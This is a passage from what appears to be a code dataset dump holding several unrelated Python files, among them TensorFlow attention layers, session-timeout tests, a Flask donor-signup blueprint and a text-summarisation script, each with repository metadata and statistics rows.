outputs = tf.nn.depth_to_space(inputs, 2)
if self.dense_layer is not None:
outputs = self.dense_layer(outputs)
return outputs
class MLP(tf.keras.layers.Layer):
"""Defines MLP layer with normalization and residual connection."""
def __init__(self,
expansion: int = 4,
dropout: float = 0.,
norm_type: Text = "batch",
activation: Callable[..., tf.Tensor] = tf.nn.relu,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
expansion: An integer for the expansion ratio of the hidden dimension.
dropout: A float for the dropout rate after dense layers.
norm_type: A string for the type of normalization.
activation: Activation function.
      kernel_initializer: Initialization function of dense kernels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self._expansion = expansion
self._dropout = dropout
self._norm_type = norm_type
self._activation = activation
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
def build(self, input_shape: tf.TensorShape) -> None:
input_dim = input_shape[-1]
common_kwargs = dict(
kernel_initializer=self._kernel_initializer,
bias_initializer=self._bias_initializer)
self.norm_layer = make_norm_layer(self._norm_type)
self.mlp_block = tf.keras.Sequential([
tf.keras.layers.Dense(
input_dim * self._expansion,
activation=self._activation,
**common_kwargs),
tf.keras.layers.Dropout(self._dropout),
tf.keras.layers.Dense(input_dim, **common_kwargs),
tf.keras.layers.Dropout(self._dropout)
])
super().build(input_shape)
def call(self,
inputs: tf.Tensor,
training: Optional[bool] = None) -> tf.Tensor:
outputs = self.norm_layer(inputs, training=training)
outputs = self.mlp_block(outputs, training=training)
return outputs + inputs
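# --- Hedged usage sketch (added): shapes and hyper-parameters below are
# illustrative; the MLP keeps the input shape and adds a residual connection.
#   mlp = MLP(expansion=4, dropout=0.1, norm_type='layer')
#   x = tf.random.normal([2, 16, 16, 64])
#   y = mlp(x, training=True)  # y.shape == x.shape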
class MultiAxisAttention(tf.keras.layers.Layer):
"""MultiAxisAttention performs attentions along multiple axes."""
def __init__(self,
num_heads: int,
key_dim: int,
attn_axes: List[List[int]],
attn_type: Text = "multi_head",
use_bias: bool = True,
dropout: float = 0.0,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
**kwargs: Any) -> None:
"""Initializer.
Args:
num_heads: An integer for the number of attention heads.
key_dim: An integer for the size of each attention head.
attn_axes: A list for the list of axes over which the attention is
applied.
attn_type: A string for attention type ("multi_head" or "multi_query").
use_bias: A boolean for whether the dense layers use biases.
dropout: A float for the dropout rate after dense layers.
      kernel_initializer: Initialization function of dense kernels.
bias_initializer: Initialization function of dense biases.
**kwargs: Additional arguments for `tf.keras.layers.Layer`.
"""
super().__init__(**kwargs)
self._num_heads = num_heads
self._key_dim = key_dim
self._attn_axes = attn_axes
self._attn_type = attn_type
self._use_bias = use_bias
self._dropout = dropout
self._scale = math.sqrt(float(key_dim))
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
def build(self, input_shape: tf.TensorShape) -> None:
input_dim = input_shape[-1]
free_dims = input_shape.rank - 1
common_kwargs = dict(
kernel_initializer=self._kernel_initializer,
bias_initializer=self._bias_initializer)
einsum_equation, bias_axes, output_rank = _build_proj_equation(
free_dims, bound_dims=1, output_dims=2)
self.query_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1,
[self._num_heads, self._key_dim]),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
if self._attn_type == "multi_head":
num_heads = self._num_heads
elif self._attn_type == "multi_query":
num_heads = 1
else:
raise ValueError(
"{} is not a recognized attention type".format(self._attn_type))
self.key_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1,
[num_heads, self._key_dim]),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
self.value_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1,
[num_heads, self._key_dim]),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
self._dot_product_equations = []
self._combine_equations = []
self.softmax_layers = []
for attn_axes in self._attn_axes:
attn_axes = tuple(attn_axes)
(dot_product_equation, combine_equation,
attn_scores_rank) = _build_attention_equation(output_rank, attn_axes)
norm_axes = tuple(
range(attn_scores_rank - len(attn_axes), attn_scores_rank))
self._dot_product_equations.append(dot_product_equation)
self._combine_equations.append(combine_equation)
self.softmax_layers.append(tf.keras.layers.Softmax(axis=norm_axes))
output_shape = [input_dim]
einsum_equation, bias_axes, output_rank = _build_proj_equation(
free_dims, bound_dims=2, output_dims=len(output_shape))
self.output_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1, output_shape),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
self.dropout_layer = tf.keras.layers.Dropout(self._dropout)
super().build(input_shape)
def call(self,
queries: tf.Tensor,
values: tf.Tensor,
training: Optional[bool] = None) -> tf.Tensor:
queries = self.query_dense(queries)
keys = self.key_dense(values)
values = self.value_dense(values)
if self._attn_type == "multi_query":
keys = tf.repeat(keys, [self._num_heads], axis=-2)
values = tf.repeat(values, [self._num_heads], axis=-2)
num_axes = len(self._attn_axes)
queries = tf.split(queries, num_or_size_splits=num_axes, axis=-2)
keys = tf.split(keys, num_or_size_splits=num_axes, axis=-2)
values = tf.split(values, num_or_size_splits=num_axes, axis=-2)
outputs = []
for i in range(num_axes):
attn_scores = tf.einsum(self._dot_product_equations[i], keys[i],
queries[i]) / self._scale
attn_scores = self.softmax_layers[i](attn_scores)
attn_scores = self.dropout_layer(attn_scores, training=training)
outputs.append(
tf.einsum(self._combine_equations[i], attn_scores, values[i]))
outputs = tf.concat(outputs, axis=-2)
outputs = self.output_dense(outputs)
return outputs
| 36.683824 | 80 | 0.668938 | 1,902 | 14,967 | 5.004732 | 0.150894 | 0.022797 | 0.038239 | 0.022691 | 0.473684 | 0.426726 | 0.405505 | 0.379872 | 0.342473 | 0.329867 | 0 | 0.004406 | 0.226565 | 14,967 | 407 | 81 | 36.773956 | 0.817899 | 0.245674 | 0 | 0.363636 | 0 | 0 | 0.023956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064394 | false | 0 | 0.018939 | 0.007576 | 0.147727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb862f4a8029cde118b843ccf18aba340863ade | 1,783 | py | Python | tests/integration/session/test_timeout.py | uk-gov-mirror/ONSdigital.eq-questionnaire-runner | 4684bc560bfc7a169e279846fb341a188decb374 | [
"MIT"
] | null | null | null | tests/integration/session/test_timeout.py | uk-gov-mirror/ONSdigital.eq-questionnaire-runner | 4684bc560bfc7a169e279846fb341a188decb374 | [
"MIT"
] | null | null | null | tests/integration/session/test_timeout.py | uk-gov-mirror/ONSdigital.eq-questionnaire-runner | 4684bc560bfc7a169e279846fb341a188decb374 | [
"MIT"
] | null | null | null | import time
from app import settings
from tests.integration.integration_test_case import IntegrationTestCase
class TestTimeout(IntegrationTestCase):
def setUp(self):
settings.EQ_SESSION_TIMEOUT_SECONDS = 4
super().setUp()
def tearDown(self):
settings.EQ_SESSION_TIMEOUT_SECONDS = 45 * 60
super().tearDown()
def test_timeout_continue_valid_session_returns_200(self):
self.launchSurvey("test_timeout")
self.get(self.last_url)
self.assertStatusOK()
def test_when_session_times_out_server_side_401_is_returned(self):
self.launchSurvey("test_timeout")
time.sleep(5)
self.get(self.last_url)
self.assertStatusUnauthorised()
self.assertInBody("Your session has timed out due to inactivity")
def test_alternate_401_page_is_displayed_when_no_cookie(self):
self.get("/session")
self.assertStatusUnauthorised()
self.assertInBody("Sorry there is a problem")
self.assertEqualPageTitle("Page is not available - Census 2021")
def test_schema_defined_timeout_cant_be_higher_than_server(self):
self.launchSurvey("test_timeout")
time.sleep(4)
self.get(self.last_url)
self.assertStatusUnauthorised()
self.assertInBody("To help protect your information we have timed you out")
self.assertEqualPageTitle("Session timed out - Census 2021")
def test_submission_complete_timeout(self):
self.launchSurvey("test_timeout")
self.post()
self.post()
time.sleep(4)
self.get(self.last_url)
self.assertStatusUnauthorised()
self.assertInBody("This page is no longer available")
self.assertEqualPageTitle("Submission Complete - Census 2021")
| 34.960784 | 83 | 0.702748 | 209 | 1,783 | 5.755981 | 0.392345 | 0.029094 | 0.0665 | 0.079801 | 0.361596 | 0.361596 | 0.230258 | 0.171239 | 0.171239 | 0.119701 | 0 | 0.020655 | 0.212563 | 1,783 | 50 | 84 | 35.66 | 0.836182 | 0 | 0 | 0.390244 | 0 | 0 | 0.173303 | 0 | 0 | 0 | 0 | 0 | 0.292683 | 1 | 0.170732 | false | 0 | 0.073171 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb9490db31d19350990f886cce9e445402e6686 | 3,571 | py | Python | nanoql/utils.py | viehwegerlib/nanoql | 152c511afcff96c869d8eff261eebd7e82bc4337 | [
"BSD-3-Clause"
] | 1 | 2019-04-24T21:38:26.000Z | 2019-04-24T21:38:26.000Z | nanoql/utils.py | phiweger/nanoql | 152c511afcff96c869d8eff261eebd7e82bc4337 | [
"BSD-3-Clause"
] | null | null | null | nanoql/utils.py | phiweger/nanoql | 152c511afcff96c869d8eff261eebd7e82bc4337 | [
"BSD-3-Clause"
] | null | null | null | def get_selection_fields(info):
'''Get all fields that are part of the (first-level) query.'''
# Is a certain field present?
# https://github.com/graphql-python/graphene/issues/462
# https://github.com/graphql-python/graphene/issues/431
sub_fields = []
for field in info.field_asts:
for selection in field.selection_set.selections:
sub_fields.append(selection.name.value)
return sub_fields
# https://gist.github.com/href/1319371
def convert_to_obj(dictionary, name='GenericDict'):
'''Convert a dict into a named tuple object.'''
from collections import namedtuple
NT = namedtuple(name, dictionary.keys())
gen_dict = NT(**dictionary)
return gen_dict
def url_base(key):
'''Return base urls.
Example:
url_base('search')
# 'http://www.ebi.ac.uk/ena/data/search'
'''
d = {'base': 'http://www.ebi.ac.uk/ena/data/',
'taxon': 'view/Taxon:',
'project': 'view/Project:',
'stats_taxon': 'stats/taxonomy/',
'retrieve': 'view/',
'search': 'search'}
return d['base'] + d[key]
def url_append(d, prefix=None):
'''
url = 'http://www.ebi.ac.uk/ena/data/view/'
params = {
'domain': 'assembly',
'result': 'assembly',
'display': 'xml'}
url += url_append(params, prefix='SOMEID')
'''
s = ''
for k, v in d.items():
s += '&{}={}'.format(k, v)
if prefix:
return str(prefix) + s # if prefix e.g. tax ID (int) cast to str
else:
return s
def sanitize_keys(d, fmt_function):
'''
stackoverflow, 11700705
Convert a nested dictionary from one convention to another.
Args:
d (dict): dictionary (nested or not) to be converted.
fmt_function (func): function that takes the string in one convention and returns it in the other one.
Returns:
Dictionary with the new keys.
Example:
\b
from dotmap import DotMap
result = xmltodict.parse(requests.get(url).text)
dm = DotMap(sanitize_keys(result, lambda key: camel_to_snake(key.replace('@', ''))))
dm.root.taxon.tax_id # '287'
dm.root.taxon.taxonomic_division # 'PRO'
dm.root.taxon.children.taxon[0].tax_id # Pseudomonas aeruginosa 2192
'''
new = {}
for k, v in d.items():
new_v = v
if isinstance(v, dict):
new_v = sanitize_keys(v, fmt_function)
elif isinstance(v, list):
new_v = list()
for x in v:
try:
new_v.append(sanitize_keys(x, fmt_function))
except AttributeError: # list contains types other than dict
new_v.append(x)
new[fmt_function(k)] = new_v
return new
def camel_to_snake(name):
'''stackoverflow, 1175208'''
import re
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def xmltodotmap(xml):
'''Turn xml (ugly) into dotmap (pretty).'''
from dotmap import DotMap
import xmltodict
from nanozoo.utils import sanitize_keys, camel_to_snake
return DotMap(
sanitize_keys(
xmltodict.parse(xml),
lambda key: camel_to_snake(key.replace('@', ''))))
def chunks(l, n):
'''
Yield successive n-sized chunks from l (stackoverflow, 312443).
a = [1, 2, 3, 4]
list(chunks(a, 2))
# [[1, 2], [3, 4]]
Returns empty list if list empty.
For overlapping chunks, see windows()
'''
for i in range(0, len(l), n):
yield l[i:i + n] | 27.898438 | 110 | 0.590871 | 484 | 3,571 | 4.264463 | 0.386364 | 0.034884 | 0.023256 | 0.017442 | 0.117733 | 0.112888 | 0.100291 | 0 | 0 | 0 | 0 | 0.022857 | 0.264912 | 3,571 | 128 | 111 | 27.898438 | 0.763429 | 0.41305 | 0 | 0.035088 | 0 | 0 | 0.097587 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140351 | false | 0 | 0.087719 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bbd87daa4cfa31b2dc33749abd08701b4188d90 | 1,742 | py | Python | imagenet/csv2txts.py | clearsky767/examples | d6c744061ba5ed56088af43edb171990c6942efd | [
"BSD-3-Clause"
] | null | null | null | imagenet/csv2txts.py | clearsky767/examples | d6c744061ba5ed56088af43edb171990c6942efd | [
"BSD-3-Clause"
] | null | null | null | imagenet/csv2txts.py | clearsky767/examples | d6c744061ba5ed56088af43edb171990c6942efd | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
import time
import os
import argparse
parser = argparse.ArgumentParser(description='csv2txts')
parser.add_argument('--path', default='test2', type=str, metavar='PATH',help='csvs path')
args = parser.parse_args()
def ReadCsv(filename):
filedata = pd.read_csv(filename)
wavedata = [elem for elem in filedata.iloc[:,1]]
return wavedata
def WriteTxt(filename,data):
fo = open(filename, "w+")
sep = "\n"
fl = fo.write(sep.join(data))
fo.close()
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
return
def Filter(data, fs = 125):
#bandpass 0.6Hz~25Hz
b, a = signal.butter(2, [40.0/60.0/fs*2,1500.0/60.0/fs*2] ,'bandpass')
filteddata = signal.filtfilt(b, a, data)
#filteddata = signal.lfilter(b, a, data)
return filteddata
def main():
start_tm = time.time()
print("now start read csv files!")
tm = time.time()
filepath = args.path
csvlist = [os.path.join(os.path.realpath('.'), filepath, file) for file in os.listdir(filepath) if os.path.splitext(file)[1] == '.csv']
for csv in csvlist:
try:
data = ReadCsv(csv)
data = Filter(data)
filename = os.path.basename(csv)
filename = filename.split(".")[0]
filename = os.path.join(os.path.realpath(filepath), "txts/{}.txt".format(filename))
data = [str(s) for s in data]
WriteTxt(filename,data)
except:
print("except {}".format(csv))
continue
print("time is {}".format(time.time()-tm))
print("total time is {}".format(time.time()-start_tm))
if __name__ == '__main__':
main()
| 28.557377 | 139 | 0.624569 | 243 | 1,742 | 4.423868 | 0.415638 | 0.03907 | 0.037209 | 0.011163 | 0.109767 | 0.059535 | 0.059535 | 0 | 0 | 0 | 0 | 0.021402 | 0.222158 | 1,742 | 60 | 140 | 29.033333 | 0.771956 | 0.033295 | 0 | 0 | 0 | 0 | 0.076694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102041 | false | 0.020408 | 0.142857 | 0 | 0.306122 | 0.081633 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bbfd9537f9395b239f5680df719f35749bdc407 | 3,700 | py | Python | lm/utils.py | CRAFIS/pycodesuggest | c21ab27e46d5c8078636f4b0b49c55e6eb9096ec | [
"MIT"
] | 1 | 2019-10-03T20:15:21.000Z | 2019-10-03T20:15:21.000Z | lm/utils.py | CRAFIS/pycodesuggest | c21ab27e46d5c8078636f4b0b49c55e6eb9096ec | [
"MIT"
] | null | null | null | lm/utils.py | CRAFIS/pycodesuggest | c21ab27e46d5c8078636f4b0b49c55e6eb9096ec | [
"MIT"
] | null | null | null | import os
import sys
import shutil
import copy
from glob import iglob
import pickle
import itertools
import datetime
import numpy as np
from model import *
def get_file_list(config, data_path, pattern, description):
files = [y for x in os.walk(data_path) for y in iglob(os.path.join(x[0], pattern))]
if len(files) == 0:
print("No partitions found for %s data, exiting..." % description)
sys.exit()
print("Found %d%s partitions for %s data"
% (len(files), " prebatched" if config.use_prebatched else "", description))
if config.num_partitions:
print("But only using %d due to num_partitions parameter" % config.num_partitions)
files = files[:config.num_partitions]
return files
def copy_temp_files(files, temp_dir):
temp_files = []
for file in files:
target_file = os.path.split(file)[1]
target_file = os.path.join(temp_dir, target_file)
shutil.copy2(file, target_file)
temp_files.append(target_file)
return temp_files
def create_model(config, is_training):
if config.attention and config.attention_variant == "input":
return AttentionModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "output":
return AttentionOverOutputModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "keyvalue":
return AttentionKeyValueModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "exlambda":
return AttentionWithoutLambdaModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "baseline":
return AttentionBaselineModel(is_training=is_training, config=config)
else:
return BasicModel(is_training=is_training, config=config)
def attention_masks(attns, masks, length):
lst = []
masks = np.array(masks)
if "full" in attns:
lst.append(np.ones([1, length]))
if "identifiers" in attns:
lst.append(masks[:, 0:length] if len(masks.shape) == 2 else np.reshape(masks[0:length], [1, length]))
return np.transpose(np.concatenate(lst)) if lst else np.zeros([0, length])
class FlagWrapper:
def __init__(self, dictionary):
self.__dict__ = dictionary
def __getattr__(self, name):
return self.__dict__['__flags'][name]
def copy_flags(flags):
dict_copy = copy.copy(flags.__dict__)
return FlagWrapper(dict_copy)
def identity_map(x):
return x
def flatmap(func, *iterable):
return itertools.chain.from_iterable(map(func, *iterable))
# from
# http://stackoverflow.com/questions/33759623/tensorflow-how-to-restore-a-previously-saved-model-python
def save_model(saver, sess, path, model, config):
if not os.path.exists(path):
os.makedirs(path)
now = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M--%f")
out_path = os.path.join(path, now + "/")
tf.train.write_graph(model.graph.as_graph_def(), out_path, 'model.pb', as_text=False)
if not os.path.exists(out_path):
os.makedirs(out_path)
with open(os.path.join(out_path, "config.pkl"), "wb") as f:
pickle.dump(config, f)
saver.save(sess, os.path.join(out_path, "model.tf"))
latest_path = os.path.join(path, "latest")
if os.path.islink(latest_path):
os.remove(latest_path)
os.symlink(now, latest_path)
return out_path
def load_model(sess, path):
load_variables(sess, os.path.join(path, "model.tf"), tf.trainable_variables())
def load_variables(session, path, variables):
saver = tf.train.Saver(variables)
saver.restore(session, path)
| 31.355932 | 109 | 0.697568 | 512 | 3,700 | 4.869141 | 0.294922 | 0.052146 | 0.028079 | 0.048135 | 0.205375 | 0.163658 | 0.121941 | 0.121941 | 0.121941 | 0.121941 | 0 | 0.005943 | 0.181351 | 3,700 | 117 | 110 | 31.623932 | 0.817101 | 0.029189 | 0 | 0 | 0 | 0 | 0.07107 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144578 | false | 0 | 0.120482 | 0.036145 | 0.445783 | 0.036145 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bc2a2578cb5ef6c6109f7a91d5e1dbf0a7adc75 | 1,920 | py | Python | client-portal/controller/khandani_sahara/khandani_sahara.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | client-portal/controller/khandani_sahara/khandani_sahara.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | client-portal/controller/khandani_sahara/khandani_sahara.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | 1 | 2021-09-19T10:58:17.000Z | 2021-09-19T10:58:17.000Z | from flask import Blueprint, request, render_template
from include.models import (
Donor as DonorModel,
Family as FamilyModel,
FinancialAid as FinancialAidModel,
)
from include.parsers import (
DonorRegistrationSchema,
FinancialAidRecipientRegistrationSchema,
)
from include.db import db_session
khandani_sahara_api = Blueprint(
"khandani_sahara", __name__, url_prefix="/khandani-sahara"
)
@khandani_sahara_api.route("/")
def index():
return render_template("khandani-sahara.html")
@khandani_sahara_api.route("/donor")
def donor():
return render_template("/donor-signup.html")
@khandani_sahara_api.route("/donor/signup", methods=["POST", "GET"])
def sign_up_donor():
if request.method == "POST":
payload = {"name": request.form["name"], "contact_num": request.form["phone"]}
args = DonorRegistrationSchema().load(payload)
donor = DonorModel(**args)
db_session.add(donor)
db_session.commit()
return render_template("/donor-signup.html")
@khandani_sahara_api.route("/recipient")
def recipient():
return render_template("/recipient-signup.html")
@khandani_sahara_api.route("/recipient/signup", methods=["POST", "GET"])
def sign_up_recipient():
if request.method == "POST":
family_obj = (
db_session.query(FamilyModel)
.filter(FamilyModel.email == request.form["email"])
.first()
)
custom_args = {
"family_id": family_obj.id,
"family_income": request.form["family_income"],
"expenses": request.form["expenses"],
}
args = FinancialAidRecipientRegistrationSchema().load(custom_args)
recipient = FinancialAidModel(**args)
db_session.add(recipient)
db_session.commit()
return render_template("/recipient-signup.html")
| 30.47619 | 87 | 0.652083 | 196 | 1,920 | 6.173469 | 0.30102 | 0.104132 | 0.084298 | 0.090909 | 0.294215 | 0.294215 | 0.183471 | 0.094215 | 0.094215 | 0.094215 | 0 | 0 | 0.221875 | 1,920 | 62 | 88 | 30.967742 | 0.809906 | 0 | 0 | 0.16 | 0 | 0 | 0.1507 | 0.023681 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.08 | 0.06 | 0.28 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7e4cac8da9f490ff5b2493db9724ce2e35f1393 | 6,458 | py | Python | code_v2/main.py | gajanlee/SLN-Summarization | 4cc23deba855e70089636db76ab0add2e2a2ffc0 | [
"Apache-2.0"
] | 1 | 2020-07-16T14:17:56.000Z | 2020-07-16T14:17:56.000Z | code_v2/main.py | gajanlee/SLN-Summarization | 4cc23deba855e70089636db76ab0add2e2a2ffc0 | [
"Apache-2.0"
] | 2 | 2021-03-31T19:49:22.000Z | 2021-12-13T20:37:29.000Z | code_v2/main.py | gajanlee/SLN-Summarization | 4cc23deba855e70089636db76ab0add2e2a2ffc0 | [
"Apache-2.0"
] | null | null | null | import nltk
import re
from collections import Counter
import string
from itertools import chain
from lxml import etree
from pathlib import Path
from copy import deepcopy
from sln import extract_relations_from_sentence, summarize, slns_to_neo4j, SLN, summarization_slns_to_neo4j
from nltk.stem import WordNetLemmatizer
from word_scoring import smi
lemmatizer = WordNetLemmatizer()
symbols = r"!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘'‛“”„‟…‧﹏."
symbols += string.punctuation + "\\"
symbols += "".join([chr(i) for i in range(945, 970)])
digits = "1234567890"
def segment_sentence(text):
return nltk.sent_tokenize(text)
def paper_corpus(file_name="147.P14-1087.xhtml.txt"):
base_path = Path("/media/lee/辽东铁骑/数据集/acl2014/RST_summary/data/acl2014/")
abstract = (base_path / "abstract" / file_name).read_text()
introduction, *sections, conclusion = (base_path / "content" / file_name).read_text().split("\n")
return abstract, introduction, " ".join(sections), conclusion
def tokenize_sentences_and_words(text):
sentences = []
for sentence_ in nltk.sent_tokenize(text.lower().replace(".", ". ")):
# sentence = sentence.lower().replace(".", ". ")
sentence = re.sub(f"[{symbols+digits}]", " ", sentence_)
sentence = "".join([char for char in sentence if 0 < ord(char) < 128])
words = nltk.word_tokenize(sentence)
words = list(map(lemmatizer.lemmatize, words))
words = [word for word in words if len(word) > 1]
if len(words) <= 3:
continue
sentences.append(words)
return sentences
def run(file_name):
abstract, introduction, section, conclusion = paper_corpus(file_name)
abstract_sentences_tokens = tokenize_sentences_and_words(abstract)
introduction_sentences_tokens = tokenize_sentences_and_words(introduction)
section_sentences_tokens = tokenize_sentences_and_words(section)
conclusion_sentences_tokens = tokenize_sentences_and_words(conclusion)
score_dict = smi(
list(chain(*(introduction_sentences_tokens + conclusion_sentences_tokens))),
list(chain(*section_sentences_tokens)),
)
whole_slns, summary_slns, summary_sentences = summarize(
introduction_sentences_tokens + section_sentences_tokens + conclusion_sentences_tokens,
deepcopy(score_dict),
)
abstract_slns = []
for sentence_tokens in abstract_sentences_tokens:
s = SLN(sentence_tokens)
s.construct()
abstract_slns.append(s)
node_statements, relation_statements = summarization_slns_to_neo4j(whole_slns, summary_slns, abstract_slns)
Path("./neo4j.txt").write_text(
"\n".join([
"MATCH (n)-[r]-() DELETE n,r",
"\n".join(node_statements),
"\n".join(relation_statements),
])
)
node_statements, relation_statements = slns_to_neo4j(summary_slns, "Generated")
Path("./generated_summary_neo4j.txt").write_text(
"\n".join([
# "MATCH (n)-[r]-() DELETE n,r",
"\n".join(node_statements),
"\n".join(relation_statements),
])
)
# print(sorted(score_dict.items(), key=lambda x: x[1]))
# sentences = []
# for sentence in nltk.sent_tokenize(introduction + " ".join(sections) + conclusion):
# sentence = sentence.lower().replace(".", ". ")
# words = nltk.word_tokenize(sentence)
# words = list(map(lemmatizer.lemmatize, words))
# sentences.append(words)
# relations = extract_relations_from_sentence(sentences)
# print(len(relations))
analysed_words = ["topic", "approach", "result", "performance", "search", "engine", "graph", "pagerank", "state", "word", "label", "method", "topic", "keywords"]
analysed_phrases = [
["topic", "keywords"],
["search", "engine"],
]
analysis(abstract_sentences_tokens,
introduction_sentences_tokens,
section_sentences_tokens,
conclusion_sentences_tokens,
summary_sentences,
summary_slns,
analysed_words,
analysed_phrases,
score_dict)
def analysis(abstract_sentences_tokens,
introduction_sentences_tokens,
section_sentences_tokens,
conclusion_sentences_tokens,
summary_sentences,
summary_slns,
analysed_words,
analysed_phrases,
score_dict):
text_sentences_tokens = introduction_sentences_tokens + section_sentences_tokens + summary_sentences
print("Abstract token count:", len(list(chain(*abstract_sentences_tokens))))
print("Full text token count:", len(list(chain(*text_sentences_tokens))))
print("Generated summary token count:", len(list(chain(*summary_sentences))))
counter = Counter(chain(*text_sentences_tokens))
introduction_counter = Counter(chain(*introduction_sentences_tokens))
conclusion_counter = Counter(chain(*conclusion_sentences_tokens))
section_counter = Counter(chain(*section_sentences_tokens))
for word in analysed_words:
print(f"Analysing word {word}")
print(f"Score is {score_dict[word]}")
print("Occur in Introduction count: ", introduction_counter.get(word, 0))
print("Occur in Middle count: ", section_counter.get(word, 0))
print("Occur in Conclusion count: ", conclusion_counter.get(word, 0))
print("====")
for phrase in analysed_phrases:
phrase = " ".join(phrase)
count = 0
for sentence in introduction_sentences_tokens:
if phrase in " ".join(sentence):
count += 1
print(f"phrase `{phrase}` occurs {count} times in Introduction.")
count = 0
for sentence in section_sentences_tokens:
if phrase in " ".join(sentence):
count += 1
print(f"phrase `{phrase}` occurs {count} times in Middle.")
count = 0
for sentence in conclusion_sentences_tokens:
if phrase in " ".join(sentence):
count += 1
print(f"phrase `{phrase}` occurs {count} times in Conclusion.")
if __name__ == "__main__":
run("100.P14-2103.xhtml.txt")
# run("4.P14-2007.xhtml.txt")
# for file_path in Path("/media/lee/辽东铁骑/数据集/acl2014/RST_summary/data/acl2014/abstract").glob("*"):
# name = file_path.name
# print(name)
# run(name) | 35.679558 | 165 | 0.649117 | 725 | 6,458 | 5.587586 | 0.215172 | 0.114786 | 0.05332 | 0.030857 | 0.405579 | 0.345841 | 0.306344 | 0.274253 | 0.258455 | 0.240188 | 0 | 0.01574 | 0.222824 | 6,458 | 181 | 166 | 35.679558 | 0.784618 | 0.102199 | 0 | 0.246032 | 0 | 0 | 0.137842 | 0.03459 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039683 | false | 0 | 0.087302 | 0.007937 | 0.150794 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7e5da80ce74b18690ef1d22753f70b220f9bdf6 | 1,979 | py | Python | modeldb/model_sync.py | jlewi/kubeflow-dev | 5e5093e182a277e8518b1a8abcccb05d20466d35 | [
"Apache-2.0"
